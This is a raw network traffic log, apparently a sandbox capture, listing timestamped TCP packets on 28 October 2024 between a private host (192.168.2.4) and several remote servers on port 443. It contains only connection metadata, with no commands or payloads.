                                                                            Oct 28, 2024 09:36:12.856383085 CET44349742104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:12.856456995 CET49742443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:12.858544111 CET49742443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:12.858652115 CET44349742104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:12.860308886 CET49742443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:12.860327005 CET44349742104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:12.911684990 CET49742443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:12.996114969 CET44349742104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:12.996354103 CET44349742104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:12.996457100 CET49742443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:13.640299082 CET49742443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:13.640361071 CET44349742104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:14.144062042 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:14.144118071 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:14.144196033 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:14.146434069 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:14.146451950 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:14.440660954 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:14.440745115 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:14.440840960 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:14.441437006 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:14.441471100 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.270575047 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.272353888 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.272420883 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.273613930 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.275216103 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.275428057 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.275829077 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.283740044 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.283850908 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.295399904 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.295450926 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.295845032 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.323367119 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409238100 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409383059 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409487009 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409573078 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.409594059 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409693956 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409749985 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.409756899 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409800053 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.409811020 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.409970999 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.410028934 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.410036087 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.414388895 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.414446115 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.414453030 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.450470924 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.470279932 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.491362095 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.525913954 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.526134968 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.526207924 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.526228905 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.526320934 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.526413918 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.526470900 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.526484966 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.526690960 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.526916027 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.527091026 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.527173042 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.527230978 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.527244091 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.527760029 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.643111944 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643289089 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643372059 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.643409967 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643511057 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643563986 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.643577099 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643671036 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643831015 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.643873930 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.643893003 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.644098043 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.644331932 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.644484043 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.644548893 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.644561052 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.695801020 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.696158886 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.696248055 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.703037024 CET49743443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.703080893 CET44349743184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760207891 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760270119 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760289907 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.760318041 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760375023 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.760376930 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760390043 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760454893 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.760468006 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760488987 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.760543108 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.768096924 CET49744443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:15.768131971 CET44349744104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.986671925 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:15.986725092 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.986789942 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:15.987245083 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:15.987260103 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:15.994725943 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.994786024 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:15.994872093 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.995506048 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:15.995538950 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:16.550005913 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:16.550098896 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.550187111 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:16.552839994 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:16.552865028 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.588011026 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.629430056 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.629450083 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.633157015 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.633261919 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.664999008 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.665225029 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.665462971 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.665477991 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.706741095 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.799256086 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.799544096 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.799627066 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.799633980 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.799664021 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.799724102 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.799757957 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.799921989 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.800004959 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.800014019 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.800059080 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.800277948 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.800282955 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.800304890 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.800405025 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.859520912 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:16.859625101 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:16.914462090 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.914674044 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.914808989 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.914814949 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.914834023 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.914974928 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915030956 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.915038109 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915091038 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.915097952 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915460110 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915529966 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.915535927 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915628910 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915682077 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.915695906 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915776014 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.915872097 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.917530060 CET49745443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.917541981 CET44349745104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.957798004 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:16.957854033 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:16.958734989 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:16.959738970 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.959777117 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:16.959870100 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.962920904 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:16.963843107 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:16.963857889 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.003350973 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:17.031589031 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.031636953 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.031733036 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.032193899 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.032213926 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.167109013 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.167968988 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.167995930 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.168888092 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.168950081 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.171139956 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.171191931 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.171591997 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.171597958 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.212801933 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:17.212872982 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:17.213005066 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:17.216753006 CET49746443192.168.2.4184.28.90.27
                                                                            Oct 28, 2024 09:36:17.216795921 CET44349746184.28.90.27192.168.2.4
                                                                            Oct 28, 2024 09:36:17.269856930 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.307153940 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307216883 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307260036 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307281017 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307281971 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.307296038 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307321072 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.307442904 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307471991 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307498932 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.307498932 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307507992 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.307549000 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.312922955 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.313035011 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.313043118 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426279068 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426307917 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426340103 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.426348925 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426409960 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.426414967 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426742077 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426822901 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.426872969 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.426878929 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.427431107 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.427452087 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.427485943 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.427489996 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.427501917 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.472976923 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.545387983 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.545536041 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.545572042 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.545598030 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.545608044 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.545650959 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.545876026 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.545931101 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.545984983 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.545989037 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.546653986 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.546693087 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.546703100 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.546706915 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.546746016 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.546747923 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.546761036 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.546821117 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.589865923 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.590214014 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.590231895 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.591347933 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.592459917 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.592631102 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.592829943 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.635359049 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.644697905 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.656796932 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.656819105 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.657119036 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.659039974 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.659101963 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.660623074 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.664648056 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.664705038 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.664731979 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.664786100 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.664792061 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.664844990 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.665229082 CET49747443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:17.665250063 CET44349747104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.703366041 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744081974 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744234085 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744324923 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744329929 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.744354010 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744410992 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.744514942 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744721889 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744796038 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.744807005 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744890928 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.744977951 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.745038986 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.745045900 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.745090961 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.745098114 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.789973974 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.801130056 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.801275969 CET44349749104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.801362038 CET49749443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.863068104 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863243103 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863383055 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863471031 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.863475084 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863502979 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863538980 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.863686085 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863754034 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.863774061 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.863864899 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.864006042 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.864012957 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.915281057 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.915288925 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.955636978 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.982737064 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.982988119 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983088017 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983170033 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.983177900 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983218908 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983232021 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.983400106 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983494043 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983549118 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.983557940 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983614922 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.983726978 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983877897 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:17.983930111 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:17.983937979 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.037535906 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:18.037555933 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.091927052 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:18.102010965 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.102185011 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.102273941 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:18.102277040 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.102304935 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.102477074 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.102538109 CET49748443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:18.102549076 CET44349748104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:18.102591991 CET49748443192.168.2.4104.18.95.41
